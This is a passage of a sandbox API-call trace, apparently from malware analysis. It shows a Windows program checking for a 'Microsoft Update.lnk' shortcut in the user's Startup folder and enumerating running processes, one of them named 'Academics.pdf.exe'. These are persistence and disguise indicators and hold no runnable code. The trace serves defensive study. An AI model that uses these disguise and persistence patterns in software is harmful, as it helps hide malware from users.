1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0286.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0286.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0286.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0286.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0286.895] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0286.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0286.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0286.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0286.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0286.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0286.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0286.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0286.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0286.896] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0286.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0286.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0286.896] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0286.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0286.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0286.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0286.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0286.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0286.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0286.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0286.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0286.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0286.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0286.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0286.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0286.898] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0286.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0286.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0286.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0286.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0286.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0286.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0286.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0286.899] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0286.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0286.899] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0286.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0286.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0286.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0286.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0286.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0286.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0286.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0286.902] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.903] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0286.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0286.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0286.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0286.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0286.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0286.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0286.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0286.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0286.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0286.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0286.920] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0286.921] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0286.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0286.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0286.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0286.925] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0286.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0286.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0286.927] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0286.928] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0286.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0286.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0286.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0286.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0286.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0286.941] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0286.942] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0286.943] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0286.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0286.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0286.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.948] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.949] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0286.950] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0286.952] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.971] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0286.972] CloseHandle (hObject=0x294) returned 1 [0286.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0286.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0286.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0286.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0286.973] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0286.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0286.973] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0286.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0286.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0286.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0286.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0286.973] RtlAllocateHeap 